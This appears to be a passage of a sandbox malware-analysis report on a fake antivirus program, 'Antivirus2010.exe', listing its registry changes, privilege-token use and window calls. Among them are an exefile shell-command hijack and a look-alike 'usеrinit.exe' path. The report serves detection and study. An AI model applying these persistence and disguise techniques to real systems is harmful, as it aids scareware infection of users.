Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\system32\svchost.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 C:\Windows\system32\svchost.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e861098c19b4244d8627ee4664a9606900000000020000000000106600000001000020000000163cca1ea239604d83655249453b2bfe89a08924bfd8dc3a3af08712b3105dac000000000e80000000020000200000000efdeeeda1aa807721ebef3fcb258a237b615dba751ddc219840e87cfded5ae990000000ae5a984ece4e72c40bdce9959c1f333db2b303801ecd826004c407a733b9dfce5267a07bbcf0dabc04420837171ecc07b36f776d425c7ec907d2b3037446ea8e2fd96315df501431693d28a5793044c9e987cc160fd92ee9e2d29f084af436b8f59ee52946e6b7bc8b117737270a4b3343f3078b4e899c5cc2d4b8e6d5fc3725763464d331cd84fee075f5606b546a1640000000fa256474240d7555eca19f7c9d652d368c619e3b7a098b46b752d35b7786ba75002f93725a688b1d226c49063051d57ce4525dee87108d56a16237690f304a59 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7EC7A6A1-D8E5-11EE-BEEC-D20227E6D795} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90de7553f26cda01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e861098c19b4244d8627ee4664a96069000000000200000000001066000000010000200000007e24c37093847c92a5cea8828a9b9169c33e42a915fca012df3ae3e6a3448679000000000e80000000020000200000003c5d8c915dd416dba54cd572cb49441b0cb3a14a00a3a21b8fbf6c22e830a68a20000000f0b19839142c4be440857e7c64b19a633b3f332ea89441644e8813db0382bdfb40000000ef37381f87dc6825d3cad41c703aa26c22bb41f58de3051179dfc655956f132ee005d8b03f159aabb87408615296a61703d98ff8ab26306e98e9bb9b6fedeef1 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e6-fb-04-fa-e0-00\WpadDecision = "0" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Main \??\globalroot\systemroot\system32\usеrinit.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{18EF7846-4696-419F-A2FA-D996D7DAE5D2}\WpadNetworkName = "Network 3" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" \??\globalroot\systemroot\system32\usеrinit.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{18EF7846-4696-419F-A2FA-D996D7DAE5D2}\WpadDecision = "0" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e6-fb-04-fa-e0-00 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{18EF7846-4696-419F-A2FA-D996D7DAE5D2}\WpadDecisionTime = a0d5a40ef26cda01 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{18EF7846-4696-419F-A2FA-D996D7DAE5D2}\WpadDecisionReason = "1" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{18EF7846-4696-419F-A2FA-D996D7DAE5D2}\e6-fb-04-fa-e0-00 C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e6-fb-04-fa-e0-00\WpadDecisionTime = a0d5a40ef26cda01 C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{18EF7846-4696-419F-A2FA-D996D7DAE5D2} C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e6-fb-04-fa-e0-00\WpadDecisionReason = "1" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00fd000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ \??\globalroot\systemroot\system32\usеrinit.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" \??\globalroot\systemroot\system32\usеrinit.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \registry\machine\Software\Classes\Interface\{2ea8c9d4-7b76-aecf-38db-17f923ffdd55} C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2ea8c9d4-7b76-aecf-38db-17f923ffdd55}\u = "3" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Key created \registry\machine\Software\Classes\Interface\{507e1fac-b73d-1bbf-56af-f783afcbf39c} C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"exefile\" /shell <%1> %*" C:\Windows\system32\svchost.exe N/A
Key created \registry\machine\Software\Classes\Wow6432Node\Interface\{2ea8c9d4-7b76-aecf-38db-17f923ffdd55} C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2ea8c9d4-7b76-aecf-38db-17f923ffdd55}\u = "3" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Token: SeDebugPrivilege N/A \??\globalroot\systemroot\system32\usеrinit.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeAuditPrivilege N/A N/A N/A
Token: SeAssignPrimaryTokenPrivilege N/A N/A N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeTakeOwnershipPrivilege N/A N/A N/A
Token: SeLoadDriverPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A N/A N/A
Token: SeAssignPrimaryTokenPrivilege N/A N/A N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeTakeOwnershipPrivilege N/A N/A N/A
Token: SeLoadDriverPrivilege N/A N/A N/A
Token: SeSystemtimePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A N/A N/A
Token: SeUndockPrivilege N/A N/A N/A
Token: SeManageVolumePrivilege N/A N/A N/A
Token: SeAssignPrimaryTokenPrivilege N/A N/A N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeTakeOwnershipPrivilege N/A N/A N/A
Token: SeLoadDriverPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A N/A N/A
Token: SeAssignPrimaryTokenPrivilege N/A N/A N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeTakeOwnershipPrivilege N/A N/A N/A
Token: SeLoadDriverPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A N/A N/A
Token: SeAssignPrimaryTokenPrivilege N/A N/A N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeTakeOwnershipPrivilege N/A N/A N/A
Token: SeLoadDriverPrivilege N/A N/A N/A
Token: SeSystemtimePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A N/A N/A
Token: SeUndockPrivilege N/A N/A N/A
Token: SeManageVolumePrivilege N/A N/A N/A
Token: SeAssignPrimaryTokenPrivilege N/A N/A N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeTakeOwnershipPrivilege N/A N/A N/A
Token: SeLoadDriverPrivilege N/A N/A N/A
Token: SeSystemtimePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A N/A N/A
Token: SeUndockPrivilege N/A N/A N/A
Token: SeManageVolumePrivilege N/A N/A N/A
Token: SeAssignPrimaryTokenPrivilege N/A N/A N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
